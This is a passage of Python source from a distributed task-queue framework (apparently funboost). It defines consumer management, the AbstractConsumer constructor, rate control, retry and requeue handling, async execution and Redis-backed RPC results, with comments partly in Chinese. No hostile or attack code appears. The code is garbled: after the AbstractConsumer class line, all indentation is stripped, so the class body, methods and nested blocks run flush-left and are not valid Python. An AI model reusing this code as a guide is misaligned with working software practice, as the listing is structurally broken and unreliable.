        """Join every consumer's scheduling thread/greenlet.

        Mainly for Linux/Windows multiprocessing compatibility: on Linux a
        child process can finish quickly even when a non-daemon thread runs a
        ``while 1`` loop, so every message-pulling thread must be joined.
        (If only Windows mattered, this would be unnecessary.)
        """
        if cls.schedual_task_always_use_thread:
            for t in cls.schedulal_thread_to_be_join:
                nb_print(t)
                t.join()
        else:
            if cls.global_concurrent_mode in [1, 4]:  # thread / async modes run real threads
                for t in cls.schedulal_thread_to_be_join:
                    t.join()
            elif cls.global_concurrent_mode == 2:  # gevent greenlets
                gevent.joinall(cls.schedulal_thread_to_be_join, raise_error=True, )
            elif cls.global_concurrent_mode == 3:  # eventlet green threads
                for g in cls.schedulal_thread_to_be_join:
                    g.wait()

    @classmethod
    def show_all_consumer_info(cls):
        # Print, once per process, a one-line summary for every consumer
        # instantiated in this interpreter.
        if not cls._has_show_conusmers_info:
            for _, consumer_info in cls.consumers_queue__info_map.items():
                stdout_write(f'{time.strftime("%H:%M:%S")} "{consumer_info["where_to_instantiate"]}"  '
                             f' \033[0;30;44m{consumer_info["queue_name"]} 的消费者\033[0m\n')
            cls._has_show_conusmers_info = True

    @staticmethod
    def get_concurrent_name_by_concurrent_mode(concurrent_mode):
        # Map the numeric ConcurrentModeEnum value to a human-readable name.
        # NOTE: returns None for an unrecognised mode.
        if concurrent_mode == 1:
            return 'thread'
        elif concurrent_mode == 2:
            return 'gevent'
        elif concurrent_mode == 3:
            return 'evenlet'
        elif concurrent_mode == 4:
            return 'async'
        elif concurrent_mode == 5:
            return 'single_thread'
# noinspection DuplicatedCode
class AbstractConsumer(LoggerLevelSetterMixin, metaclass=abc.ABCMeta, ):
time_interval_for_check_do_not_run_time = 60
BROKER_KIND = None
@property
@decorators.synchronized
def publisher_of_same_queue(self):
    # Lazily build, once and thread-safely, a publisher bound to this
    # consumer's own queue (used e.g. for requeueing and RPC replies).
    if not self._publisher_of_same_queue:
        self._publisher_of_same_queue = get_publisher(self._queue_name, consuming_function=self.consuming_function,
                                                      broker_kind=self.BROKER_KIND, log_level_int=self._log_level,
                                                      is_add_file_handler=self._create_logger_file)
        if self._msg_expire_senconds:
            # Message expiry needs the publish timestamp on every message.
            self._publisher_of_same_queue.set_is_add_publish_time()
    return self._publisher_of_same_queue
def bulid_a_new_publisher_of_same_queue(self):
    # Build a brand-new (non-cached) publisher for this consumer's queue.
    # NOTE: the method name typo ("bulid") is part of the public interface
    # and must be kept for backward compatibility.
    return get_publisher(self._queue_name, broker_kind=self.BROKER_KIND)
@classmethod
def join_shedual_task_thread(cls):
    """Convenience wrapper delegating to
    ConsumersManager.join_all_consumer_shedual_task_thread()."""
    ConsumersManager.join_all_consumer_shedual_task_thread()
# noinspection PyProtectedMember,PyUnresolvedReferences
def __init__(self, queue_name, *, consuming_function: Callable = None, function_timeout=0, concurrent_num=50,
specify_concurrent_pool=None, specify_async_loop=None, concurrent_mode=ConcurrentModeEnum.THREADING,
max_retry_times=3, log_level=10, is_print_detail_exception=True, is_show_message_get_from_broker=False,
qps: float = 0, is_using_distributed_frequency_control=False,
msg_expire_senconds=0, is_send_consumer_hearbeat_to_redis=False,
logger_prefix='', create_logger_file=True, do_task_filtering=False,
task_filtering_expire_seconds=0,
is_do_not_run_by_specify_time_effect=False,
do_not_run_by_specify_time=('10:00:00', '22:00:00'),
schedule_tasks_on_main_thread=False,
function_result_status_persistance_conf=FunctionResultStatusPersistanceConfig(
False, False, 7 * 24 * 3600),
is_using_rpc_mode=False):
"""
:param queue_name:
:param consuming_function: 处理消息的函数。
:param function_timeout : 超时秒数,函数运行超过这个时间,则自动杀死函数。为0是不限制。
# 如果设置了qps,并且cocurrent_num是默认的50,会自动开了500并发,由于是采用的智能线程池任务少时候不会真开那么多线程而且会自动缩小线程数量。具体看ThreadPoolExecutorShrinkAble的说明
# 由于有很好用的qps控制运行频率和智能扩大缩小的线程池,此框架建议不需要理会和设置并发数量只需要关心qps就行了,框架的并发是自适应并发数量,这一点很强很好用。
:param concurrent_num:并发数量,并发种类由concurrent_mode决定
:param specify_concurrent_pool:使用指定的线程池/携程池,可以多个消费者共使用一个线程池,不为None时候。threads_num失效
:param specify_async_loop:指定的async的loop循环,设置并发模式为async才能起作用。
:param concurrent_mode:并发模式,1线程(ConcurrentModeEnum.THREADING) 2gevent(ConcurrentModeEnum.GEVENT)
3eventlet(ConcurrentModeEnum.EVENTLET) 4 asyncio(ConcurrentModeEnum.ASYNC) 5单线程(ConcurrentModeEnum.SINGLE_THREAD)
:param max_retry_times:
:param log_level: # 这里是设置消费者 发布者日志级别的,如果不想看到很多的细节显示信息,可以设置为 20 (logging.INFO)。
:param is_print_detail_exception:函数出错时候时候显示详细的错误堆栈,占用屏幕太多
:param is_show_message_get_from_broker: 从中间件取出消息时候时候打印显示出来
:param qps:指定1秒内的函数执行次数,例如可以是小数0.01代表每100秒执行一次,也可以是50代表1秒执行50次.为0则不控频。
:param is_using_distributed_frequency_control: 是否使用分布式空频(依赖redis统计消费者数量,然后频率平分),默认只对当前实例化的消费者空频有效。
假如实例化了2个qps为10的使用同一队列名的消费者,并且都启动,则每秒运行次数会达到20。如果使用分布式空频则所有消费者加起来的总运行次数是10。
:param is_send_consumer_hearbeat_to_redis 时候将发布者的心跳发送到redis,有些功能的实现需要统计活跃消费者。因为有的中间件不是真mq。
:param logger_prefix: 日志前缀,可使不同的消费者生成不同的日志
:param create_logger_file : 是否创建文件日志
:param do_task_filtering :是否执行基于函数参数的任务过滤
:param task_filtering_expire_seconds:任务过滤的失效期,为0则永久性过滤任务。例如设置过滤过期时间是1800秒 ,
30分钟前发布过1 + 2 的任务,现在仍然执行,
如果是30分钟以内发布过这个任务,则不执行1 + 2,现在把这个逻辑集成到框架,一般用于接口价格缓存。
:param is_do_not_run_by_specify_time_effect :是否使不运行的时间段生效
:param do_not_run_by_specify_time :不运行的时间段
:param schedule_tasks_on_main_thread :直接在主线程调度任务,意味着不能直接在当前主线程同时开启两个消费者。
:param function_result_status_persistance_conf :配置。是否保存函数的入参,运行结果和运行状态到mongodb。
这一步用于后续的参数追溯,任务统计和web展示,需要安装mongo。
:param is_using_rpc_mode 是否使用rpc模式,可以在发布端获取消费端的结果回调,但消耗一定性能,使用async_result.result时候会等待阻塞住当前线程。
执行流程为
1、 实例化消费者类,设置各种控制属性
2、启动 start_consuming_message 启动消费
3、start_consuming_message 中 调用 _shedual_task 从中间件循环取消息
4、 _shedual_task 中调用 _submit_task,将 任务 添加到并发池中并发运行。
5、 函数执行完成后,运行 _confirm_consume , 确认消费。
各种中间件的 取消息、确认消费 单独实现,其他逻辑由于采用了模板模式,自动复用代码。
"""
self.init_params = copy.copy(locals())
self.init_params.pop('self')
self.init_params['broker_kind'] = self.__class__.BROKER_KIND
self.init_params['consuming_function'] = consuming_function
ConsumersManager.consumers_queue__info_map[queue_name] = current_queue__info_dict = copy.copy(self.init_params)
current_queue__info_dict['consuming_function'] = str(consuming_function) # consuming_function.__name__
current_queue__info_dict['specify_async_loop'] = str(specify_async_loop)
current_queue__info_dict[
'function_result_status_persistance_conf'] = function_result_status_persistance_conf.to_dict()
current_queue__info_dict['class_name'] = self.__class__.__name__
concurrent_name = ConsumersManager.get_concurrent_name_by_concurrent_mode(concurrent_mode)
current_queue__info_dict['concurrent_mode_name'] = concurrent_name
# 方便点击跳转定位到当前解释器下所有实例化消费者的文件行,点击可跳转到该处。
# 获取被调用函数在被调用时所处代码行数
# 直接实例化相应的类和使用工厂模式来实例化相应的类,得到的消费者实际实例化的行是不一样的,希望定位到用户的代码处,而不是定位到工厂模式处。也不要是boost装饰器本身处。
line = sys._getframe(0).f_back.f_lineno
# 获取被调用函数所在模块文件名
file_name = sys._getframe(1).f_code.co_filename
if 'consumer_factory.py' in file_name:
line = sys._getframe(1).f_back.f_lineno
file_name = sys._getframe(2).f_code.co_filename
if r'funboost\__init__.py' in file_name or 'funboost/__init__.py' in file_name:
line = sys._getframe(2).f_back.f_lineno
file_name = sys._getframe(3).f_code.co_filename
if r'funboost\helpers.py' in file_name or 'funboost/helpers.py' in file_name:
line = sys._getframe(3).f_back.f_lineno
file_name = sys._getframe(4).f_code.co_filename
current_queue__info_dict['where_to_instantiate'] = f'{file_name}:{line}'
self._queue_name = queue_name
self.queue_name = queue_name # 可以换成公有的,免得外部访问有警告。
if consuming_function is None:
raise ValueError('必须传 consuming_function 参数')
self.consuming_function = consuming_function
self._function_timeout = function_timeout
# 如果设置了qps,并且cocurrent_num是默认的50,会自动开了500并发,由于是采用的智能线程池任务少时候不会真开那么多线程而且会自动缩小线程数量。具体看ThreadPoolExecutorShrinkAble的说明
# 由于有很好用的qps控制运行频率和智能扩大缩小的线程池,此框架建议不需要理会和设置并发数量只需要关心qps就行了,框架的并发是自适应并发数量,这一点很强很好用。
if qps != 0 and concurrent_num == 50:
self._concurrent_num = 500
else:
self._concurrent_num = concurrent_num
self._specify_concurrent_pool = specify_concurrent_pool
self._specify_async_loop = specify_async_loop
self._concurrent_pool = None
self._concurrent_mode = concurrent_mode
self._max_retry_times = max_retry_times
self._is_print_detail_exception = is_print_detail_exception
self._is_show_message_get_from_broker = is_show_message_get_from_broker
self._qps = qps
self._msg_schedule_time_intercal = 0 if qps == 0 else 1.0 / qps
self._is_using_distributed_frequency_control = is_using_distributed_frequency_control
self._is_send_consumer_hearbeat_to_redis = is_send_consumer_hearbeat_to_redis or is_using_distributed_frequency_control
self._msg_expire_senconds = msg_expire_senconds
if self._concurrent_mode not in (1, 2, 3, 4, 5):
raise ValueError('设置的并发模式不正确')
self._concurrent_mode_dispatcher = ConcurrentModeDispatcher(self)
if self._concurrent_mode == 4:
self._run = self._async_run # 这里做了自动转化,使用async_run代替run
self._logger_prefix = logger_prefix
self._log_level = log_level
if logger_prefix != '':
logger_prefix += '--'
# logger_name = f'{logger_prefix}{self.__class__.__name__}--{concurrent_name}--{queue_name}--{self.consuming_function.__name__}'
logger_name = f'{logger_prefix}{self.__class__.__name__}--{queue_name}'
# nb_print(logger_name)
self._create_logger_file = create_logger_file
self._log_level = log_level
log_file_handler_type = 1
if int(os.getenv('is_fsdf_remote_run', 0)) == 1: # 这个是远程部署的自动的环境变量,用户不需要亲自自己设置这个值。
log_file_handler_type = 5 # 如果是fabric_deploy 自动化远程部署函数时候,python -c 启动的使用第一个filehandler没记录文件,现在使用第5种filehandler。
self.logger = get_logger(logger_name, log_level_int=log_level, log_filename=f'{logger_name}.log' if create_logger_file else None,
log_file_handler_type=log_file_handler_type,
formatter_template=funboost_config_deafult.NB_LOG_FORMATER_INDEX_FOR_CONSUMER_AND_PUBLISHER, )
# self.logger.info(f'{self.__class__} 在 {current_queue__info_dict["where_to_instantiate"]} 被实例化')
stdout_write(f'{time.strftime("%H:%M:%S")} "{current_queue__info_dict["where_to_instantiate"]}" \033[0;30;44m此行 '
f'实例化队列名 {current_queue__info_dict["queue_name"]} 的消费者, 类型为 {self.__class__}\033[0m\n')
self._do_task_filtering = do_task_filtering
self._redis_filter_key_name = f'filter_zset:{queue_name}' if task_filtering_expire_seconds else f'filter_set:{queue_name}'
filter_class = RedisFilter if task_filtering_expire_seconds == 0 else RedisImpermanencyFilter
self._redis_filter = filter_class(self._redis_filter_key_name, task_filtering_expire_seconds)
self._unit_time_for_count = 10 # 每隔多少秒计数,显示单位时间内执行多少次,暂时固定为10秒。
self._execute_task_times_every_unit_time = 0 # 每单位时间执行了多少次任务。
self._lock_for_count_execute_task_times_every_unit_time = Lock()
self._current_time_for_execute_task_times_every_unit_time = time.time()
self._consuming_function_cost_time_total_every_unit_time = 0
self._last_execute_task_time = time.time() # 最近一次执行任务的时间。
self._msg_num_in_broker = 0
self._last_timestamp_when_has_task_in_queue = 0
self._last_timestamp_print_msg_num = 0
self._is_do_not_run_by_specify_time_effect = is_do_not_run_by_specify_time_effect
self._do_not_run_by_specify_time = do_not_run_by_specify_time # 可以设置在指定的时间段不运行。
self._schedule_tasks_on_main_thread = schedule_tasks_on_main_thread
self._result_persistence_helper = ResultPersistenceHelper(function_result_status_persistance_conf, queue_name)
self._is_using_rpc_mode = is_using_rpc_mode
self.stop_flag = False
# 控频要用到的成员变量
self._last_submit_task_timestamp = 0
self._last_start_count_qps_timestamp = time.time()
self._has_execute_times_in_recent_second = 0
self._publisher_of_same_queue = None
self.consumer_identification = f'{nb_log_config_default.computer_name}_{nb_log_config_default.computer_ip}_' \
f'{time_util.DatetimeConverter().datetime_str.replace(":", "-")}_{os.getpid()}_{id(self)}'
self.consumer_identification_map = {'queue_name': self.queue_name,
'computer_name': nb_log_config_default.computer_name,
'computer_ip': nb_log_config_default.computer_ip,
'process_id': os.getpid(),
'consumer_id': id(self),
'consumer_uuid': str(uuid.uuid4()),
'start_datetime_str': time_util.DatetimeConverter().datetime_str,
'start_timestamp': time.time(),
'hearbeat_datetime_str': time_util.DatetimeConverter().datetime_str,
'hearbeat_timestamp': time.time(),
'consuming_function': self.consuming_function.__name__,
'code_filename': Path(self.consuming_function.__code__.co_filename).as_posix()
}
self._delay_task_scheduler = BackgroundScheduler(timezone=funboost_config_deafult.TIMEZONE)
self._delay_task_scheduler.add_executor(ApschedulerThreadPoolExecutor(2)) # 只是运行submit任务到并发池,不需要很多线程。
self._delay_task_scheduler.add_listener(self.__apscheduler_job_miss, EVENT_JOB_MISSED)
self._delay_task_scheduler.start()
self.custom_init()
atexit.register(self.join_shedual_task_thread)
def __check_monkey_patch(self):
if self._concurrent_mode == 2:
check_gevent_monkey_patch()
elif self._concurrent_mode == 3:
check_evenlet_monkey_patch()
else:
check_not_monkey()
@property
@decorators.synchronized
def concurrent_pool(self):
return self._concurrent_mode_dispatcher.build_pool()
def custom_init(self):
pass
def keep_circulating(self, time_sleep=0.001, exit_if_function_run_sucsess=False, is_display_detail_exception=True,
block=True):
"""间隔一段时间,一直循环运行某个方法的装饰器
:param time_sleep :循环的间隔时间
:param is_display_detail_exception
:param exit_if_function_run_sucsess :如果成功了就退出循环
:param block:是否阻塞在当前主线程运行。
"""
def _keep_circulating(func):
@wraps(func)
def __keep_circulating(*args, **kwargs):
# noinspection PyBroadException
def ___keep_circulating():
while 1:
try:
result = func(*args, **kwargs)
if exit_if_function_run_sucsess:
return result
except Exception as e:
msg = func.__name__ + ' 运行出错\n ' + traceback.format_exc(
limit=10) if is_display_detail_exception else str(e)
self.logger.exception(msg)
finally:
time.sleep(time_sleep)
if block:
return ___keep_circulating()
else:
threading.Thread(target=___keep_circulating, ).start()
return __keep_circulating
return _keep_circulating
# noinspection PyAttributeOutsideInit
def start_consuming_message(self):
ConsumersManager.show_all_consumer_info()
# noinspection PyBroadException
try:
self._concurrent_mode_dispatcher.check_all_concurrent_mode()
self.__check_monkey_patch()
except Exception:
traceback.print_exc()
os._exit(4444) # noqa
self.logger.warning(f'开始消费 {self._queue_name} 中的消息')
if self._is_send_consumer_hearbeat_to_redis:
self._distributed_consumer_statistics = DistributedConsumerStatistics(self._queue_name, self.consumer_identification, self.consumer_identification_map)
self._distributed_consumer_statistics.run()
self.logger.warning(f'启动了分布式环境 使用 redis 的键 hearbeat:{self._queue_name} 统计活跃消费者 ,当前消费者唯一标识为 {self.consumer_identification}')
self.keep_circulating(10, block=False)(self.check_heartbeat_and_message_count)() # 间隔时间最好比self._unit_time_for_count小整数倍,不然日志不准。
if self._do_task_filtering:
self._redis_filter.delete_expire_filter_task_cycle() # 这个默认是RedisFilter类,是个pass不运行。所以用别的消息中间件模式,不需要安装和配置redis。
if self._schedule_tasks_on_main_thread:
self.keep_circulating(1)(self._shedual_task)()
else:
self._concurrent_mode_dispatcher.schedulal_task_with_no_block()
setattr(funboost_config_deafult, 'has_start_a_consumer_flag', 1)
@abc.abstractmethod
def _shedual_task(self):
"""
每个子类必须实现这个的方法,完成如何从中间件取出消息,并将函数和运行参数添加到工作池。
:return:
"""
raise NotImplementedError
def _print_message_get_from_broker(self, broker_name, msg):
if isinstance(msg, (dict, list)):
msg = json.dumps(msg, ensure_ascii=False)
# print(999)
if self._is_show_message_get_from_broker:
self.logger.debug(f'从 {broker_name} 中间件 的 {self._queue_name} 中取出的消息是 {msg}')
def __get_priority_conf(self, kw: dict, broker_task_config_key: str):
broker_task_config = kw['body'].get('extra', {}).get(broker_task_config_key, None)
if broker_task_config is None:
return getattr(self, f'_{broker_task_config_key}', None)
else:
return broker_task_config
# noinspection PyMethodMayBeStatic
def _get_concurrent_info(self):
concurrent_info = ''
''' 影响了日志长度和一丝丝性能。
if self._concurrent_mode == 1:
concurrent_info = f'[{threading.current_thread()} {threading.active_count()}]'
elif self._concurrent_mode == 2:
concurrent_info = f'[{gevent.getcurrent()} {threading.active_count()}]'
elif self._concurrent_mode == 3:
# noinspection PyArgumentList
concurrent_info = f'[{eventlet.getcurrent()} {threading.active_count()}]'
'''
return concurrent_info
def _run(self, kw: dict, ):
t_start_run_fun = time.time()
max_retry_times = self.__get_priority_conf(kw, 'max_retry_times')
current_function_result_status = FunctionResultStatus(self.queue_name, self.consuming_function.__name__, kw['body'])
current_retry_times = 0
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
for current_retry_times in range(max_retry_times + 1):
current_function_result_status = self._run_consuming_function_with_confirm_and_retry(kw, current_retry_times=current_retry_times,
function_result_status=FunctionResultStatus(
self.queue_name, self.consuming_function.__name__,
kw['body']),
)
if current_function_result_status.success is True or current_retry_times == max_retry_times or current_function_result_status.has_requeue:
break
self._result_persistence_helper.save_function_result_to_mongo(current_function_result_status)
if current_function_result_status.success is False and current_retry_times == max_retry_times:
self.logger.critical(
f'函数 {self.consuming_function.__name__} 达到最大重试次数 {self.__get_priority_conf(kw, "max_retry_times")} 后,仍然失败, 入参是 {function_only_params} ')
self._confirm_consume(kw) # 错得超过指定的次数了,就确认消费了。
if self.__get_priority_conf(kw, 'do_task_filtering'):
self._redis_filter.add_a_value(function_only_params) # 函数执行成功后,添加函数的参数排序后的键值对字符串到set中。
if self.__get_priority_conf(kw, 'is_using_rpc_mode'):
# print(function_result_status.get_status_dict(without_datetime_obj=
with RedisMixin().redis_db_frame.pipeline() as p:
# RedisMixin().redis_db_frame.lpush(kw['body']['extra']['task_id'], json.dumps(function_result_status.get_status_dict(without_datetime_obj=True)))
# RedisMixin().redis_db_frame.expire(kw['body']['extra']['task_id'], 600)
p.lpush(kw['body']['extra']['task_id'],
json.dumps(current_function_result_status.get_status_dict(without_datetime_obj=True)))
p.expire(kw['body']['extra']['task_id'], 600)
p.execute()
with self._lock_for_count_execute_task_times_every_unit_time:
self._execute_task_times_every_unit_time += 1
self._consuming_function_cost_time_total_every_unit_time += time.time() - t_start_run_fun
self._last_execute_task_time = time.time()
if time.time() - self._current_time_for_execute_task_times_every_unit_time > self._unit_time_for_count:
avarage_function_spend_time = round(self._consuming_function_cost_time_total_every_unit_time / self._execute_task_times_every_unit_time, 4)
msg = f'{self._unit_time_for_count} 秒内执行了 {self._execute_task_times_every_unit_time} 次函数 [ {self.consuming_function.__name__} ] ,' \
f'函数平均运行耗时 {avarage_function_spend_time} 秒'
if self._msg_num_in_broker != -1:
if hasattr(self, '_distributed_consumer_statistics'):
active_consumer_num = self._distributed_consumer_statistics.active_consumer_num
else:
active_consumer_num = 1
# msg += f''' ,预计还需要 {time_util.seconds_to_hour_minute_second(self._msg_num_in_broker * avarage_function_spend_time / active_consumer_num)} 时间 才能执行完成 {self._msg_num_in_broker}个剩余的任务'''
msg += f''' ,预计还需要 {time_util.seconds_to_hour_minute_second(self._msg_num_in_broker / (self._execute_task_times_every_unit_time / self._unit_time_for_count) / active_consumer_num)}''' + \
f''' 时间 才能执行完成 {self._msg_num_in_broker}个剩余的任务'''
self.logger.info(msg)
self._current_time_for_execute_task_times_every_unit_time = time.time()
self._consuming_function_cost_time_total_every_unit_time = 0
self._execute_task_times_every_unit_time = 0
def _run_consuming_function_with_confirm_and_retry(self, kw: dict, current_retry_times,
function_result_status: FunctionResultStatus, ):
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
t_start = time.time()
function_result_status.run_times = current_retry_times + 1
try:
function_timeout = self.__get_priority_conf(kw, 'function_timeout')
function_run = self.consuming_function if not function_timeout else self._concurrent_mode_dispatcher.timeout_deco(
function_timeout)(self.consuming_function)
function_result_status.result = function_run(**function_only_params)
if asyncio.iscoroutine(function_result_status.result):
self.logger.critical(f'异步的协程消费函数必须使用 async 并发模式并发,请设置 '
f'消费函数 {self.consuming_function.__name__} 的concurrent_mode 为 ConcurrentModeEnum.ASYNC 或 4')
# noinspection PyProtectedMember,PyUnresolvedReferences
os._exit(4)
function_result_status.success = True
self._confirm_consume(kw)
if self.__get_priority_conf(kw, 'do_task_filtering'):
self._redis_filter.add_a_value(function_only_params) # 函数执行成功后,添加函数的参数排序后的键值对字符串到set中。
if self._log_level <= logging.DEBUG:
result_str_to_be_print = str(function_result_status.result)[:100] if len(str(function_result_status.result)) < 100 else str(function_result_status.result)[:100] + ' 。。。。。 '
self.logger.debug(f' 函数 {self.consuming_function.__name__} '
f'第{current_retry_times + 1}次 运行, 正确了,函数运行时间是 {round(time.time() - t_start, 4)} 秒,入参是 {function_only_params} '
f' 结果是 {result_str_to_be_print} , {self._get_concurrent_info()} ')
except Exception as e:
if isinstance(e, (PyMongoError,
ExceptionForRequeue)): # mongo经常维护备份时候插入不了或挂了,或者自己主动抛出一个ExceptionForRequeue类型的错误会重新入队,不受指定重试次数逇约束。
self.logger.critical(f'函数 [{self.consuming_function.__name__}] 中发生错误 {type(e)} {e},消息重新入队')
time.sleep(1) # 防止快速无限出错入队出队,导致cpu和中间件忙
self._requeue(kw)
function_result_status.has_requeue = True
return function_result_status
self.logger.error(f'函数 {self.consuming_function.__name__} 第{current_retry_times + 1}次运行发生错误,'
f'函数运行时间是 {round(time.time() - t_start, 4)} 秒,\n 入参是 {function_only_params} \n 原因是 {type(e)} {e} ',
exc_info=self.__get_priority_conf(kw, 'is_print_detail_exception'))
# traceback.print_exc()
function_result_status.exception = f'{e.__class__.__name__} {str(e)}'
return function_result_status
async def _async_run(self, kw: dict, ):
# """虽然和上面有点大面积重复相似,这个是为了asyncio模式的,asyncio模式真的和普通同步模式的代码思维和形式区别太大,
# 框架实现兼容async的消费函数很麻烦复杂,连并发池都要单独写"""
t_start_run_fun = time.time()
max_retry_times = self.__get_priority_conf(kw, 'max_retry_times')
current_function_result_status = FunctionResultStatus(self.queue_name, self.consuming_function.__name__, kw['body'])
current_retry_times = 0
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
for current_retry_times in range(max_retry_times + 1):
current_function_result_status = await self._async_run_consuming_function_with_confirm_and_retry(kw, current_retry_times=current_retry_times,
function_result_status=FunctionResultStatus(
self.queue_name, self.consuming_function.__name__,
kw['body']),
)
if current_function_result_status.success is True or current_retry_times == max_retry_times or current_function_result_status.has_requeue:
break
# self._result_persistence_helper.save_function_result_to_mongo(function_result_status)
await simple_run_in_executor(self._result_persistence_helper.save_function_result_to_mongo, current_function_result_status)
if current_function_result_status.success is False and current_retry_times == max_retry_times:
self.logger.critical(
f'函数 {self.consuming_function.__name__} 达到最大重试次数 {self.__get_priority_conf(kw, "max_retry_times")} 后,仍然失败, 入参是 {function_only_params} ')
# self._confirm_consume(kw) # 错得超过指定的次数了,就确认消费了。
await simple_run_in_executor(self._confirm_consume, kw)
if self.__get_priority_conf(kw, 'do_task_filtering'):
# self._redis_filter.add_a_value(function_only_params) # 函数执行成功后,添加函数的参数排序后的键值对字符串到set中。
await simple_run_in_executor(self._redis_filter.add_a_value, function_only_params)
if self.__get_priority_conf(kw, 'is_using_rpc_mode'):
def push_result():
with RedisMixin().redis_db_frame.pipeline() as p:
p.lpush(kw['body']['extra']['task_id'],
json.dumps(current_function_result_status.get_status_dict(without_datetime_obj=True)))
p.expire(kw['body']['extra']['task_id'], 600)
p.execute()
await simple_run_in_executor(push_result)
# 异步执行不存在线程并发,不需要加锁。
self._execute_task_times_every_unit_time += 1
self._consuming_function_cost_time_total_every_unit_time += time.time() - t_start_run_fun
self._last_execute_task_time = time.time()
if time.time() - self._current_time_for_execute_task_times_every_unit_time > self._unit_time_for_count:
avarage_function_spend_time = round(self._consuming_function_cost_time_total_every_unit_time / self._execute_task_times_every_unit_time, 4)
msg = f'{self._unit_time_for_count} 秒内执行了 {self._execute_task_times_every_unit_time} 次函数 [ {self.consuming_function.__name__} ] ,' \
f'函数平均运行耗时 {avarage_function_spend_time} 秒'
if self._msg_num_in_broker != -1:
if hasattr(self, '_distributed_consumer_statistics'):
active_consumer_num = self._distributed_consumer_statistics.active_consumer_num
else:
active_consumer_num = 1
# msg += f''' ,预计还需要 {time_util.seconds_to_hour_minute_second(self._msg_num_in_broker * avarage_function_spend_time / active_consumer_num)} 时间 才能执行完成 {self._msg_num_in_broker}个剩余的任务'''
msg += f''' ,预计还需要 {time_util.seconds_to_hour_minute_second(self._msg_num_in_broker / (self._execute_task_times_every_unit_time / self._unit_time_for_count) / active_consumer_num)} ''' + \
f''' 时间 才能执行完成 {self._msg_num_in_broker}个剩余的任务'''
self.logger.info(msg)
self._current_time_for_execute_task_times_every_unit_time = time.time()
self._consuming_function_cost_time_total_every_unit_time = 0
self._execute_task_times_every_unit_time = 0
async def _async_run_consuming_function_with_confirm_and_retry(self, kw: dict, current_retry_times,
function_result_status: FunctionResultStatus, ):
"""虽然和上面有点大面积重复相似,这个是为了asyncio模式的,asyncio模式真的和普通同步模式的代码思维和形式区别太大,
框架实现兼容async的消费函数很麻烦复杂,连并发池都要单独写"""
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
function_result_status.run_times = current_retry_times + 1
# noinspection PyBroadException
t_start = time.time()
try:
corotinue_obj = self.consuming_function(**function_only_params)
if not asyncio.iscoroutine(corotinue_obj):
self.logger.critical(f'当前设置的并发模式为 async 并发模式,但消费函数不是异步协程函数,'
f'请不要把消费函数 {self.consuming_function.__name__} 的 concurrent_mode 设置为 4')
# noinspection PyProtectedMember,PyUnresolvedReferences
os._exit(444)
if self._function_timeout == 0:
rs = await corotinue_obj
# rs = await asyncio.wait_for(corotinue_obj, timeout=4)
else:
rs = await asyncio.wait_for(corotinue_obj, timeout=self._function_timeout)
function_result_status.result = rs
function_result_status.success = True
# self._confirm_consume(kw)
await simple_run_in_executor(self._confirm_consume, kw)
if self.__get_priority_conf(kw, 'do_task_filtering'):
# self._redis_filter.add_a_value(function_only_params) # 函数执行成功后,添加函数的参数排序后的键值对字符串到set中。
await simple_run_in_executor(self._redis_filter.add_a_value, function_only_params)
if self._log_level <= logging.DEBUG:
result_str_to_be_print = str(rs)[:100] if len(str(rs)) < 100 else str(rs)[:100] + ' 。。。。。 '
self.logger.debug(f' 函数 {self.consuming_function.__name__} '
f'第{current_retry_times + 1}次 运行, 正确了,函数运行时间是 {round(time.time() - t_start, 4)} 秒,'
f'入参是 【 {function_only_params} 】 ,结果是 {result_str_to_be_print} 。 {corotinue_obj} ')
except Exception as e:
if isinstance(e, (PyMongoError,
ExceptionForRequeue)): # mongo经常维护备份时候插入不了或挂了,或者自己主动抛出一个ExceptionForRequeue类型的错误会重新入队,不受指定重试次数逇约束。
self.logger.critical(f'函数 [{self.consuming_function.__name__}] 中发生错误 {type(e)} {e},消息重新入队')
# time.sleep(1) # 防止快速无限出错入队出队,导致cpu和中间件忙
await asyncio.sleep(1)
# return self._requeue(kw)
await simple_run_in_executor(self._requeue, kw)
function_result_status.has_requeue = True
return function_result_status
self.logger.error(f'函数 {self.consuming_function.__name__} 第{current_retry_times + 1}次运行发生错误,'
f'函数运行时间是 {round(time.time() - t_start, 4)} 秒,\n 入参是 {function_only_params} \n 原因是 {type(e)} {e} ',
exc_info=self.__get_priority_conf(kw, 'is_print_detail_exception'))
function_result_status.exception = f'{e.__class__.__name__} {str(e)}'
return function_result_status
@abc.abstractmethod
def _confirm_consume(self, kw):
"""确认消费"""
raise NotImplementedError
def check_heartbeat_and_message_count(self):
self._msg_num_in_broker = self.publisher_of_same_queue.get_message_count()
if time.time() - self._last_timestamp_print_msg_num > 60:
if self._msg_num_in_broker != -1:
self.logger.info(f'队列 [{self._queue_name}] 中还有 [{self._msg_num_in_broker}] 个任务')
self._last_timestamp_print_msg_num = time.time()
if self._msg_num_in_broker != 0:
self._last_timestamp_when_has_task_in_queue = time.time()
return self._msg_num_in_broker
@abc.abstractmethod
def _requeue(self, kw):
"""重新入队"""
raise NotImplementedError
def __apscheduler_job_miss(self, event):
"""
这是 apscheduler 包的事件钩子。
ev.function_args = job.args
ev.function_kwargs = job.kwargs
ev.function = job.func
:return:
"""
# print(event.scheduled_run_time)
misfire_grace_time = self.__get_priority_conf(event.function_kwargs["kw"], 'misfire_grace_time')
self.logger.critical(f'现在时间是 {time_util.DatetimeConverter().datetime_str} ,'
f'比此任务规定的本应该的运行时间 {event.scheduled_run_time} 相比 超过了指定的 {misfire_grace_time} 秒,放弃执行此任务 \n'
f'{event.function_kwargs["kw"]["body"]} ')
self._confirm_consume(event.function_kwargs["kw"])
'''
if self.__get_priority_conf(event.function_kwargs["kw"], 'execute_delay_task_even_if_when_task_is_expired') is False:
self.logger.critical(f'现在时间是 {time_util.DatetimeConverter().datetime_str} ,此任务设置的延时运行已过期 \n'
f'{event.function_kwargs["kw"]["body"]} , 此任务放弃执行')
self._confirm_consume(event.function_kwargs["kw"])
else:
self.logger.warning(f'现在时间是 {time_util.DatetimeConverter().datetime_str} ,此任务设置的延时运行已过期 \n'
f'{event.function_kwargs["kw"]["body"]} ,'
f'但框架为了防止是任务积压导致消费延后,所以仍然使其运行一次')
event.function(*event.function_args, **event.function_kwargs)
'''
def _submit_task(self, kw):
if self._judge_is_daylight():
self._requeue(kw)
time.sleep(self.time_interval_for_check_do_not_run_time)
return
